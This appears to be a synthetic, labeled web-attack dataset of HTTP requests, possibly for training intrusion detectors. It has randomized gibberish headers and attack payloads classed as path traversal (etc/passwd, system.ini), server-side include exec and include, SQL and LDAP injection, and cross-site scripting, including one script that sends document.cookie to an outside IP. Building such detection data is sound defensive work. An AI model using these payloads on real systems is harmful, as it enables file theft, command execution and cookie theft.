Accept-Charset: iso-8859-9;q=0.5, euc-kr, iso-8859-2, utf-8;q=0.7, windows-874;q=0.5
Accept-Encoding: gzip, gzip;q=0.4, identity, identity
Accept-Language: 7-te7ono;q=0.5, nrohoi-Srtk90wc, txewrred-tbsaber, essw-dhgeyei;q=0.1, aesotnp-eteon
Cache-Control: no-store
Client-ip: 211.190.214.99
Cookie: gsMCeEi=whQ;huqlts7srHavcn=w1G;Laccess_logK-x4=btt;uu;ng;gty8YdOvjAnF=nnhivq5;9gDLBHacceptBP=/hhl6zofjo0EcsD
Cookie2: $Version="8"
Date: Thu, 06 Mar 08 01:56:32 UTC
ETag: "pUzROrgjSs9Xmvu4TxL"
Expect: 100-continue
From: sfatroh@4tt9delj7a.org
If-Modified-Since: Sat, 13 May 06 06:12:11 GMT
If-Unmodified-Since: Fri, 28 May 04 05:35:49 GMT
If-Match: "N1LzR.y0lIGT68z"
If-None-Match: *
If-Range: *
Max-Forwards: 5351
MIME-Version: 7.0
Pragma: lCbhoBeh=asresse
Authorization: Digest algorithm=MD5-sess
Range: 248-
Referer: /atorort/tdeivy/7mslt5.jpg
TE: gzip,gzip;q=0.9
Trailer: If-Modified-Since
User-Agent: Mozilla/3.7 (Windows; U; Win98 8.6; Ds-7i; rv:9.2.6) Gecko/20981823
UA-CPU: MIPS
UA-Disp: 1492,649,16
UA-OS: Windows NT
UA-Color: color8
Via: 2.5 www.atpuSicc.jpg
Transfer-Encoding: grg3ro
Warning: 469 www.eeshc.gif:6 "8tbhssqusptoj" 
X-Serial-Number: 532844106814003
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48158
Start - Id: 36000
class: PathTransversal
POST /VM2xp_j3P-ap/uTdQfW8z_1DiRD@UDAX/6CBn_hCc.2V/ewi@9lq/iu/iz@Uiy@hHMwDO/olimjrer5/uN/nni1eehe0i/roVqicutgX0FYCp_OF/saeriepehe/WM0script@.tiff? HTTP/1.1
Content-Length: 119
Content-Language: rl,b7t,edte0yvl
Content-Encoding: gzip
Content-Location: /3copa.dll
Content-MD5: b3luVHV1aVJvZTFzZWVhaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 24 Sep 08 20:06:43 CET
Last-Modified: Sun, 19 Aug 07 13:02:45 GMT
Host: 17.150.91.150
Connection: qfsl
Accept: image/*, video/quicktime, video/*
Accept-Charset: iso-8859-5;q=0.3, x-mac-cyrillic;q=0.5, windows-1257, iso-8859-2;q=0.5
Accept-Encoding: deflate, identity;q=0.4, gzip;q=0.3, gzip;q=0.6, identity
Accept-Language: shA-cseze;q=0.0, 3o-9Y, ayrzo-rly6dln, eabaeu-stzothe;q=0.5
Cache-Control: no-transform
Client-ip: 64.200.116.35
Cookie: ee3tn9s6smte8=dn8vtRbmtotah;ifnedhhotljgr=tossxilcrefn
Cookie2: $Version="232"
Date: Mon, 19 Feb 07 17:21:02 GMT
ETag: W/"z@mku5d_bz8gZ96"
Expect: 100-continue
From: rA7tR@tqia61e.ch
If-Modified-Since: Sat, 10 Jun 06 17:26:14 UTC
If-Unmodified-Since: Mon, 19 Jun 06 20:40:34 GMT
If-Match: "Dz@NEzwdnh2mHynFDBs"
If-None-Match: *
If-Range: Mon, 10 Dec 07 22:40:25 GMT
Max-Forwards: 82
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: NTLM YXRlb2F1ZHJFMWhvaWVlbHJzTHRYZWU3MWRkb29nb3Q=
Authorization: NTLM Zm1hdGZ3MWFsYzBOcWJyM2VpZWg3MXRsWWl0dWJmZ3plZG9q
Range: 4611-51,7-,2106-
Referer: http://www.Nhunie.cz/m0qi4cs/iess/paNtqOtm/ysoce/nwnuhg.jsp
TE: chunked,trailers,chunked
Trailer: Accept
User-Agent: rSJUoZUy http://www.Tuhr.org
UA-Disp: 2185,9932,16
UA-OS: Win98
UA-Pixels: 551x993
Via: 1.1 231.169.214.196, 2.7 105.213.1.233, 0.1 www.owoo7t.css
Transfer-Encoding: identity
Upgrade: Aeae/7.7, asLuh/9.6
Warning: 420 www.esiroa.js "tdoieaa" "Wed, 03 Jan 07 09:34:59 GMT"
X-Forwarded-For: 133.228.168.254
~~~~~: ~~~~~~~~~~

lubtitOa=zE5RsPA16&6xrileuvrfsRm=3:\winnt\boot.ini&mm7ReeT=xitwo 9 eanph-gehRmc&LggstwU=u owncxmlAetcs=Zin\me

End - Id: 36000
Start - Id: 40683
class: SSI
GET /rUJUt0osRfTC38CLcPv/includeI/9cETAkZUk/nvz_m/sbOprleEbxmfhwoWG/tvfTzDV2j/letE.png?enl=%3C%21--++%23include+++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++++--%3E HTTP/1.0
Host: www.an6n1fci.com
Connection: keep-alive
Accept: audio/*, video/*;q=0.1, image/gif;q=0.9
Accept-Charset: gb2312, x-mac-arabic;q=0.7, cp-936;q=0.3, x-mac-hebrew
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=049
Client-ip: 59.227.224.32
Cookie: Ggtmqpfineo=r2PXU4lYF7;eg1lna8ZtntwE=OsicnesimFtsaty
Cookie2: $Version="591"
Date: Wed, 04 May 05 24:57:37 UTC
ETag: W/"nQowONbBuqGBRqoN"
Expect: cestnmle
From: kyipfoyn@ugT7me.be
If-Modified-Since: Sun, 07 Jun 09 13:58:06 UTC
If-Unmodified-Since: Mon, 10 Sep 07 04:09:34 CET
If-Match: "_eByC4P2Td_2SlwfLz"
If-None-Match: "PKLcRLAZ67Myw_cmco"
If-Range: Fri, 10 Jun 05 17:03:14 GMT
Max-Forwards: 7007
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: 7ErGn uhoHor=snhF8oef
Range: -41940,-0
Referer: http://ea47chtL.gov/crvIre/noehmh/Nees.css
TE: trailers,chunked;q=0.1
Trailer: Accept-Encoding
User-Agent: Mozilla/5.0 (compatible; swhyhe; Win 9x; 3inenc4co; kw9s)
UA-CPU: StrongARM
UA-Disp: 854,3532,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 106x2848
Via: 8.8 www.gu0eo.jpg, 9.9 84.87.197.198, 8.8 www.hegt2Nme.jpg:33
Transfer-Encoding: gzip
Upgrade: 2vu/5.3, otv/1.9, eEln/4.0, xlziey/0.0, f5sv/6.9
X-Forwarded-For: 199.225.165.233
X-Serial-Number: 017478485639
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40683
Start - Id: 42051
class: SqlInjection
GET /nwP.zT_vG603NW9ipTcF/a6/xeoaGtBespofee6sy/sTD@rgeocBExRO7@@x/rwoTI0k6G.jI5ETn1/fhyrwh/iYK-eFz17s-0a/sPZ8B5K5R-kBib5O/crtlptioayrE/v@YxUUSsIYGw4rsock_stream.gif?bnh=lixl%3Fqa0s4%7CsmailSna%24fha&5nqoohaoceCwo=746&xew=58312423&ohlooudegn=330&cWXEGaYxmS8i=hiquy%3A%3D%29g6kc7m&sninseaS6fge=isnte%24nrw%29d7te&optd7documentPT2BC=6&mhU=%27select+customer_phone+%27%7C%7C%27from+customers++%27%7C%7C%27where++customer_surname%3D%27%27%27%7C%7C++++lv_surname%7C%7C%27%27%27+and++customer_type%3D1%27%3B&ebeeh9aehisr=89&plrttwSodih=A&et6hnaehottarzo=19 HTTP/1.0
Host: 168.246.109.222
Connection: close
Accept: video/mpeg
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.6
Accept-Language: et37i-woa, o-usrs1sr;q=0.4
Cache-Control: max-stale
Client-ip: 172.68.108.190
Cookie: rgsehrtnl3EaR=375728;yhea=j vls2apshsnullNformc;tnUeN3ednErtN=be.;epiof=8Ae
Cookie2: $Version="46"
Date: Tue, 24 Aug 04 14:03:53 GMT
ETag: "zWjqHOL2ecS3XXB"
Expect: 100-continue
From: lhrrhh9j@48Flats.biz
If-Modified-Since: Fri, 26 Oct 07 08:20:18 UTC
If-Unmodified-Since: Sun, 24 Jan 10 12:27:10 CET
If-Match: *
If-None-Match: "SDSPQP06P2nd1XtnJY"
If-Range: "e2Ju.ac4fHkdh3jyVE."
Max-Forwards: 83
MIME-Version: 8.6
Pragma: hohu=eOrbE
Proxy-Authorization: Digest nonce
Authorization: 5hra 0ytzc=3ariec
Range: -256
Referer: http://www.y1rmzE.uk/atdr.bin
TE: gzip;q=0.4
Trailer: Host
User-Agent: Mozilla/8.2 (Machintosh; U; PPC Mac OS X 6.5; nd-hn; rv:7.2.3) Gecko/24179394
UA-CPU: MIPS
UA-Disp: 7502,392,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 307x472
Via: 7ee/6.1 196.216.120.158, FTP/0.0 www.1tmhapa.html, 6.7 163.28.121.133:7083
Transfer-Encoding: hh8e
Upgrade: Ens/2.7, ieoa/3.9, 4tt/2.8, ind/4.0, sute/1.0
Warning: 264 99.10.30.250 "a0gtsj1ecytcw5Eqrc" 
X-Forwarded-For: 206.224.167.230
X-Serial-Number: 001394948859071824
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 42051
Start - Id: 37544
class: LdapInjection
PUT /attDoi3/0kFKViu_/tGDiGmCHelKJ9WeEfHPa/bekn0/jlMoQ-zBTqq%uDz/rv7iaestiDygsNee.msf? HTTP/1.0
Content-Length: 225
Content-Language: n,annxx
Content-Encoding: identity
Content-Location: /1oyn4xe/6omo/enri/onbcIt.php
Content-MD5: dWV5dXN0YWVydWNEZ2VkYw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 02 Oct 07 19:40:03 CET
Last-Modified: Tue, 14 Mar 06 23:41:22 GMT
Host: www.3obh.fr:6
Connection: close
Accept: */*;q=0.0
Accept-Charset: x-mac-greek, iso-8859-8, utf-7
Accept-Encoding: 
Accept-Language: gtqifw-eomy;q=0.2
Cache-Control: max-age=2963
Client-ip: 75.168.219.135
Cookie: ectibsbnthc57eu=hNmacqet0nyEote;iblcnpafnc3n6r=riHoO
Cookie2: $Version="00"
Date: Mon, 18 Sep 06 08:02:37 CET
ETag: W/"L-bilC0AMrYy5N6SeCRy"
Expect: 3hainp=yeeT
From: nIt1h@rvrs.org
If-Modified-Since: Sun, 06 Apr 08 18:27:07 GMT
If-Unmodified-Since: Wed, 15 Jun 05 21:57:36 UTC
If-Match: "5HrHWNqt-vzBcgI8"
If-None-Match: "FfXz0MQlWO0Py95pXt"
If-Range: Sat, 15 May 04 17:49:40 CET
Max-Forwards: 779
MIME-Version: 5.3
Pragma: Noawao='cbwyiia'
Proxy-Authorization: NTLM MWh3dWdhbzRnbFRudnVqZmpiRWxsbmgzZHMwd2IyZWZsZWVuaEpkb25jcWdFTnV0
Authorization: NTLM ZHR6aW5uYWViZW5hc0Nhc210NHJ4ZWxlcnJpb3Jub2dkcnV0dGky
Range: 0516-7855,069180-,334-
Referer: http://el3An.org/7mhjer/1amehh/7eEse/xRopnh/cm8ldtTu.bin
TE: gzip
Trailer: TE
User-Agent: Mozilla/0.2 (Windows; U; WinNT 8.1; er-Wc; rv:2.3.7) Gecko/71998805
UA-CPU: MIPS
UA-Color: color32
UA-Pixels: 523x786
Via: dqhx/9.3 www.3aosh.html, 9.7 www.afuRoia.png
Transfer-Encoding: identity
Upgrade: 7dan1/4.1, egy/8.2, adh/9.9, duh9t/0.3
Warning: 227 252.72.14.82:7062 "mheeahgq" 
X-Serial-Number: 749091
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

cwenpp0=rgferIpsu6f&IZphLK=oe&E9S8raInck=tGMcXe@yA&std=o5c&TymaSsreeeeee=0eq&poRaoOfecipei=54491&md=994697&tpvraOi=870615&68DT.eC=) (  |(si=nrl*)&ketyE=56982683&ttmamamzye=w1exiaLcetrahW&EaeauDgxrhaeiou=67699571

End - Id: 37544
Start - Id: 38354
class: LdapInjection
GET /yiUAlmrtuoOdeifaao8o/r8qh0/a2qr9P@n-ddwAz/EwrAbbininput@E4GBx2/g_Hm/wd0A/3S6DKK/6ucneExdar1aIhv.mspx?YuTDv0G9WJ=%29+++%28++%7C%28cn%3D*o++++%27brien*++%29%28mail++++%3D*o+%27brien*++++%29++&on3=685&uzd=%24olhtacces9rageco7m%5Coaoasf&m5fa=%2F4zechoiee%5CIw&5blehbemoser=i%2F&ertwc=263711472&rPGnullQR1Qadmindiv=7&imsn=hy%40v%266%5DdMeeaa&oaArpuebaqssS=td HTTP/1.1
Host: www.tiwctne.fr:80
Connection: ntnyorwa
Accept: */*
Accept-Charset: iso-8859-6, gb2312;q=0.8
Accept-Encoding: 
Accept-Language: nI-7vaww3ri;q=0.0, Dvasd-o;q=0.5
Cache-Control: max-age=0
Client-ip: 193.201.183.61
Cookie: enrentgr=89;e0rt3ayh=9n;eoynnsheeuer=ned9qlArsl
Cookie2: $Version="67"
Date: Sat, 20 Mar 10 09:29:09 UTC
ETag: W/"5LoC-V6hl1TUEpQHFV"
Expect: 100-continue
From: 8hntrge@aiwetonej.uk
If-Modified-Since: Tue, 07 Aug 07 24:16:11 UTC
If-Unmodified-Since: Mon, 26 Apr 04 09:33:28 UTC
If-Match: "yzc6eQdiiKE7Bnon39"
If-None-Match: "mGo_po3utfyxgeArFL"
If-Range: *
Max-Forwards: 2
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: Digest response="24bdDc9027Eaafbdb25b48aD0Bc2B85e"
Authorization: NTLM SHNkOG5lZ2E1bWgzNWlpZkhqdHNleXRTaW1sbkluM2N1ZW9PcnlSdQ==
Range: 0-190754,-136
Referer: /wtEs.cfm
TE: trailers
Trailer: Accept-Encoding
User-Agent: ik5wme3oycgtsx
UA-CPU: 68000
UA-Disp: 854,896,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 8555x781
Via: rtsedt/4.7 217.111.49.196
Transfer-Encoding: gzip
Upgrade: Mso/2.1, 5stNn/1.9, etusna/2.9, fettee/0.9, 7agirn/3.3
Warning: 566 www.yfryp.tiff "ewpadovcn" 
X-Forwarded-For: 176.194.226.79
X-Serial-Number: 9579642646846
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38354
Start - Id: 39984
class: SSI
GET /dyPS9w7zR6CPwf/aeMeAtscaidbHl6gi9c/g6x.EFUSQ/Eesrkzso3ihnc/new/cKDjYXiDzAk/tOnDbXI.png?oaisEe=%3C%21--++++%23exec+++cmd%3D%22%2Fbin%2Fls+++++-l++++%2Fhome%2Fehh5xr4e%2F0hoi8%22+++++--%3E&drztbbvst=03&POv9b=937&ns3nsd=Raedshutdownj&clen=50641493&Tg02@Yb=517401&rSnllT4sT=nx_p&hwflenaoit=sWt&h4=rGKZPP&hy2cterh=1itdqWc7he&tw4=onAQ.I0E&aKrepYyto=0835083 HTTP/1.0
Host: www.lnnls2t.uk:816
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.0, deflate, identity, identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 8.168.66.173
Cookie: oo=ltc&+5sdjspcucdstdin0nsI
Cookie2: $Version="941"
Date: Sun, 02 Jul 06 10:25:10 UTC
ETag: "syLbFXo8hSf7y.nXN"
Expect: 100-continue
From: 5iWxsCt@nr6efecsn.de
If-Modified-Since: Sat, 30 Apr 05 20:33:05 GMT
If-Unmodified-Since: Mon, 09 Jul 07 03:36:18 UTC
If-Match: "gNTnTG4npWGmsZra"
If-None-Match: "IKdmC7jKu_85OKGJs"
If-Range: Fri, 01 Jul 05 04:25:20 CET
Max-Forwards: 6
MIME-Version: 3.3
Pragma: 71h=sO
Proxy-Authorization: NTLM NlQ2YWhtdWl0dGR2TGxlem9OZW50dG9vaXI5VTVicmlzc2xnbm9rZW9sdGVuZWU=
Authorization: aNtti hpho=sbL68
Range: -038647,3950-886928
Referer: http://mpl3gE.st/flmtjt/ello/iqte/tpaxae/jh3NrEo.js
TE: trailers,chunked;q=0.7
Trailer: Transfer-Encoding
User-Agent: Mozilla/9.4 (Windows; U; Win 9x 2.7; SE-th; rv:6.2.2) Gecko/01344849
UA-CPU: Sparc
UA-Disp: 8616,110,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 8811x8791
Via: 5.1 225.118.131.159, EeOi/4.7 252.53.14.181, HTTP/7.4 130.212.95.161
Transfer-Encoding: identity
Upgrade: ptgi/5.0, Tpaeet/6.5
Warning: 988 144.42.79.118:49591 "sspeenqeLi3zyDee" "Thu, 16 Jun 05 19:34:26 GMT"
X-Serial-Number: 754321
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39984
Start - Id: 39590
class: SSI
GET /als/ms4nwxaHeAia/oerreoaturYse1sHtK2/Z4O/nkaae6oTeiT/dVDbgsound.asp?en9t38Erprocessing-instructionKUsock_stream=m5g&tcv3ns=%28wp-tc%2Bt%2BawLoc%3Bgcp&dRy1gI7=%25dc&Fhtacces_VhomeOW6P30C=hjaaqolrD50etrn5pt&njLtoLanqtl=hs&t0uoe9pesCalau3=Os4&8aOeoaRlnn=1468&ycelagynuoNti=roeecho5Rt%26glinksincludehe&rTuea=%3C%21--++%23include+virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22++--%3E&nkL=libeiushutdown8ausrvoi64ae HTTP/1.1
Host: www.espq.st
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-1;q=0.4, iso-8859-8, windows-1257
Accept-Encoding: 
Accept-Language: nihte-rtlfRit, EeeraeUe-tascr;q=0.0
Cache-Control: aa=anqospe
Client-ip: 139.247.11.55
Cookie: deleteDCEzYq=6sxa3my]leu;tahea=mxsjnx
Cookie2: $Version="5"
Date: Tue, 13 Apr 10 08:28:20 UTC
ETag: "YVC3VkK4ypDbvG-NGs"
Expect: etree
From: szEete@ence.uk
If-Modified-Since: Wed, 23 Sep 09 06:35:21 GMT
If-Unmodified-Since: Mon, 21 Nov 05 02:38:08 CET
If-Match: "m.7mcn.IJkvP32cjlT2G"
If-Range: "cYls4Mbt8SBIZMo"
Max-Forwards: 32
Pragma: eeh='eInew'
Authorization: nHdi ga5e=ou2cdG
Range: 5591-,251722-40474
Referer: /fiwreIo9.pdf
TE: trailers,trailers,chunked;q=0.8
Trailer: Accept-Language
User-Agent: ia1t0/8.7
UA-Disp: 779,442,32
UA-OS: Win98
Via: FTP/9.7 www.s0lR.png, 5.4 212.150.22.147
Transfer-Encoding: deflate
Upgrade: oshili/5.5, wen/5.9
Warning: 693 www.esm2no.shtml:36 "eEi40rmtp" "Sun, 28 Feb 10 20:28:26 CET"

null

End - Id: 39590
Start - Id: 40330
class: SSI
GET /Hy/gQtR/insertereplace0allJG/zortnserwyg/oM@/yqZ0ck/uSVv/tv2dHI@-0vF.49CHBu/oYtj7/hG/af7HF/7epdif.js?LgCgall--m.o=eYP7cHF4_&dnwE0esf=wlezwhudgIrmbaeu&edhteOr=%3C%21--++++%23exec+++++cmd%3D%22c%3A%5Cprogra%7E1%5CtsuioIwxy%5CeSir4ldosz%5Cnnlorcla.exe+++d%3A%5Cedryi%5Cwww.tatiasicen.org%5CxsoN70aD%5Cdatabase.mdb+++%2Fx++++exporttofoxpro%22--%3E&m5yenhawdip=02999971&dheaJyrosRaaea=oeo&fm1ta=reydh&i9TeeiOHmorns9=e+hi45autmpbe&baah6cihaitH=9982 HTTP/1.1
Host: www.nen3iAkl.uk
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: x-mac-turkish, euc-tw;q=0.6, euc-cn;q=0.9, cp-950
Accept-Encoding: 
Accept-Language: *;q=0.0
Client-ip: 54.20.185.113
Date: Wed, 28 Feb 07 14:51:15 GMT
ETag: "-2SnMmPGNUPDo6afli"
If-Modified-Since: Tue, 03 Feb 09 19:11:07 UTC
If-None-Match: *
If-Range: "YK@2pHQeybGz5xlhns"
Max-Forwards: 85
MIME-Version: 0.7
Authorization: Basic RXdsYXBzOmFuM3c5bmRy
Referer: /eOesl3/T4iAczh.mpg
User-Agent: nantEo4Om (tn3xTLEte; xUHW31; olHoCzeqV)
UA-Pixels: 6151x427
Transfer-Encoding: identity

null

End - Id: 40330
Start - Id: 36033
class: PathTransversal
GET /hlobnntznyiytiiHd1/oesjry/rdyi3.jpg?deedlloit=%5CWINDOWS%5Csystem.ini&e1=esenome8Aao&sopen5j=4nhI0rb&l2nm=snelchs&SV2kR0B=91704&c8zB0=5720500&y.hMyYnf-kdV=e7partii7lbiel HTTP/1.1
Host: www.Aehtten.it
Connection: fcoz
Accept: */*
Accept-Charset: windows-1258;q=0.3
Accept-Encoding: 
Accept-Language: wAp6t-tgwiasg, sunahs-erOor9u, 8snqoa-rn
Cache-Control: min-fresh=37265
Client-ip: 126.60.242.180
Cookie: 98=3d;ztb=75303;N8pnha8ltttw=eb+erroern2w;LacndpMylt=Naerl2
Cookie2: $Version="384"
Date: Wed, 29 Sep 04 07:07:28 GMT
ETag: "@DqH@f35fP9EUzd2"
Expect: 100-continue
From: yko0aa0@wnoagzEgT.de
If-Modified-Since: Tue, 01 Dec 09 02:41:06 CET
If-Unmodified-Since: Tue, 23 Jan 07 09:41:21 UTC
If-Match: "jLbpLv0-VZBq@9h@VXJ"
If-None-Match: "dH9H.DIJE9oxAbgdUuh"
If-Range: Fri, 28 Aug 09 12:25:19 UTC
Max-Forwards: 8
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: NTLM cHNicHlsZWVkd2J1bjM0aHFpdGR0SWNveTFzZGxFRnpkMHRqYW8=
Authorization: Digest nonce
Range: -9,25-34306,2-799
Referer: http://www.sesNo.uk/oanertat.png
TE: trailers
Trailer: If-Match
User-Agent: 1tcvJeihpnbXes2t6ea
UA-Disp: 1024,515,8
UA-OS: Windows 95
UA-Color: color32
Via: HTTP/0.3 www.rhwat.gif, 4.0 www.8ds5mig.css
Transfer-Encoding: deflate
Upgrade: r6o/7.3, yasdf/6.0, unlO/6.7
Warning: 147 www.drndra.tiff "Slyqiecbrsiea" "Wed, 18 May 05 16:14:14 UTC"
X-Forwarded-For: 45.91.182.246
X-Serial-Number: 83480
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36033
Start - Id: 46909
class: XSS
POST /eyQ/s5RtSjfXa/hset4pedtoxrnam/7Pk@6obodyVQuv/wLIJ/nuL@cL6DuAQR4iTpE.dll? HTTP/1.1
Content-Length: 236
Content-Language: Odand,reo
Content-Encoding: gzip
Content-Location: /r9T5s/bfem2/thtnirei/aoot.png
Content-MD5: dG9oR2VsbGlvbmFiaGxscg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 01 Apr 08 20:20:19 UTC
Last-Modified: Sat, 05 Aug 06 20:43:13 UTC
Host: www.Znewnz.org
Connection: keep-alive
Accept: video/*, image/gif;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: pSi-uuea;q=0.6, eCdn29tm-gei;q=0.3, tn-Th, s-ealdedhh
Cache-Control: no-cache
Client-ip: 44.189.197.231
Cookie: tah=rnf;msqh=eg4H0KLmR1;U2IJ_R-e-=544;GserdlhhEl1dmv=eRt6CUVrUww;0FdQ31n@J=e1ue%sdN/0dd7nuehttpsn\exec&
Cookie2: $Version="1"
Date: Sun, 11 Feb 07 17:37:43 CET
ETag: W/"utOApzZbAhT5WSy.P0"
Expect: E2exe=EsamTnl
From: 8se9efj@lkeeudtih.com
If-Modified-Since: Tue, 28 Dec 04 16:44:26 UTC
If-Unmodified-Since: Sat, 09 May 09 12:38:30 CET
If-Match: *
If-None-Match: "SCyIy_4.FzJwg@gLU0OY"
If-Range: Tue, 01 Sep 09 22:30:12 CET
Max-Forwards: 0120
MIME-Version: 9.1
Pragma: autu=r
Proxy-Authorization: NTLM Y2NlbUFhZmIzc3JobmUwMm14bGVyZWlpbWk4eGVUZzJocmVodGluRWl4aXRuaVo=
Authorization: NTLM cmw1YXRhNmVhdHRFdG5taGRwdDJuaGhud3VGc2VtZWpjZXY3aWlz
Range: -790
Referer: http://www.yrlzC.net/os0rirri.msf
TE: deflate,chunked;q=0.2
Trailer: Expect
User-Agent: 6MtnoNroe4oD8awjrei
UA-CPU: MIPS
UA-Disp: 2330,130,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 8473x700
Via: dtrhlb/5.0 159.117.136.254, 8.9 www.H9ien.jpg
Transfer-Encoding: deflate
Upgrade: sdW/7.9, agrd/5.9, wt6wa9/7.2
Warning: 749 124.119.94.150:741 "rcapb76l7ke" "Tue, 13 Dec 05 01:19:14 GMT"
X-Forwarded-For: 59.28.178.137
X-Serial-Number: 3374825125599046
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

oedrt=114343&xEoafAwamlp1a=+irincludeeemT0a<dropyqfems&bMF-CO_q=<div   style   =   "     behaviour:     url([http://www.ni.com/script/talate55.mdb]);   "  >&uNosoc9egnic=rK.T8QSp4X&eerlnReigitR3ls=591

End - Id: 46909
Start - Id: 47163
class: XSS
GET /n1-Y@15/cEehwL1aeuts/swas6seiprel/nQMq79CFfz1W/so8ho3tbiwis/axo7sexqiuuO6tsac2tH.png?YB8f@=%3Cstyle+%3E%3C%21--%3C%2Fstyle%3E%3Cscript+%3E%5Bwindow.open%28%27http%3A%2F%2F81.159.148.139%2For.mspx%27%2Bdocument.cookie%29%3B%5D%2F%2F--%3E%3C%2Fscript++%3E&ilfe=object+t9%25&eaneFacctmt=EttmbtQk3ntua&connectvVVe.rUaZwindow.openB=itahbrmf&661z.=kuo&Aau3ip=614697&ynhnhtBu=rtchoddt2&ls=ndrrllht&so0O7gRfjy5m=07030834&tbsAsOewtgdmyr=623623&e3telwg=r2%25pefEeestg&httpwano55=Nessorvo+una&awyeOwAuordel=7289911249&update9Sh@BO=swEvU4eqGL&aricstsey4q=toaxef1 HTTP/1.1
Host: www.us7snew.st
Connection: bppul
Accept: */*
Accept-Charset: iso-8859-15;q=0.6, utf-7;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 123.54.69.161
Cookie: eohasf9R=4824803;9BvbscriptJ=eo;sde=eegov;FnFtEln=6v;qm0cihhobxei7M=aiSueetysws;jdrne0r=tb
Cookie2: $Version="26"
Date: Sat, 04 Mar 06 09:41:03 GMT
ETag: W/"9@Bw_-eoMUThmpdWyC6"
Expect: gtnerzt=Id9itho;tuni=iedt2
From: rRktr@tnrerr.uk
If-Modified-Since: Tue, 09 Oct 07 15:31:44 UTC
If-Unmodified-Since: Tue, 15 Jan 08 02:45:59 GMT
If-Match: *
If-None-Match: "Io-b84zdkEvEMlWVzlDn"
If-Range: Sat, 26 May 07 22:34:38 CET
Max-Forwards: 2063
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Digest response="A354AfF913f0aEf3F0CAdDFBA4c0E2c5"
Authorization: Basic aWllbmlnbTpjZW90
Range: -016,1-,67332-47295
Referer: http://www.saoevas.fr/tNte.mdb
TE: gzip;q=0.3,trailers
Trailer: Trailer
User-Agent: gmaceh/1.0.2
UA-CPU: 68000
UA-Disp: 9157,127,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 6020x621
Via: HTTP/1.8 69.67.233.218:7
Transfer-Encoding: gzip
Upgrade: 7hadcl/7.9, 8tJSt/5.4, qlttea/4.8
Warning: 131 246.175.42.21 "cjoft" 
X-Forwarded-For: 36.159.65.174
X-Serial-Number: 02973768667711464
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47163
Start - Id: 46283
class: PathTransversal
GET /qnr5rOros/wT1Tek-xrRF7Sfk/ye.p/ar/.WpDTzGpzmaYu/hmwnocE1hyoPrIaxutcw/uS/neieokl/oy1etjtesrmsfna4rft.cgi?eftt36f=69636905&KyW5t=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&nsE6td=fDotweiaw1mi%3Afa&aiityeh=lW%7Cgeehtzjat&fnnioenyl=+s01b&tkedgAte4sgde9a=39738&ofateO=nUk1&kPGZhtpass6mZD=+An%7Ch%40gge&dcbnAotee8e=feSt%27qic&iis=nqJ3O95I HTTP/1.1
Host: www.notkmat.net
Connection: keep-alive
Accept: audio/*;q=0.0, video/*;q=0.5
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: ift-8;q=0.3, dw-2pbil;q=0.6, h6tcs5m-lt09c;q=0.4, sd-eezt64;q=0.2
Cache-Control: no-store
Client-ip: 54.146.114.194
Cookie: 4dQ=y2H4retigxeobtyism;9qaccess_logBDxmljandxp_=ectuel3rsse4msyhaq;4nlstiwIl=cconnectis;dnoeaher8=sot8tEh;6a8m=ubs6_x63d0NO
Cookie2: $Version="7"
Date: Wed, 19 Mar 08 18:37:34 UTC
ETag: W/"Tr79t_UXhl_B.uI5Su"
Expect: 100-continue
From: rhcEtdlT@plt6rnlmRh.it
If-Modified-Since: Tue, 06 Jul 04 23:06:20 GMT
If-Unmodified-Since: Thu, 18 Mar 10 24:25:32 UTC
If-Match: "brpk6iGhZ@Eq7W6cn"
If-None-Match: "ADv5vXCPlEfadxCR"
If-Range: "F2AXr@tKv_gxtA4KF"
Max-Forwards: 774
MIME-Version: 4.9
Pragma: nehtx=iror3
Proxy-Authorization: NTLM d29vc2FoY21qbE9uYW90ZW5jc2hzNnRpZWxvVGxPbjRlYWd0cjRl
Authorization: Basic ZXRyOUk6N2xtc2g=
Range: 5-,07-2
Referer: http://2lhorofe.st/0stytb1o.html
TE: trailers
Trailer: If-Unmodified-Since
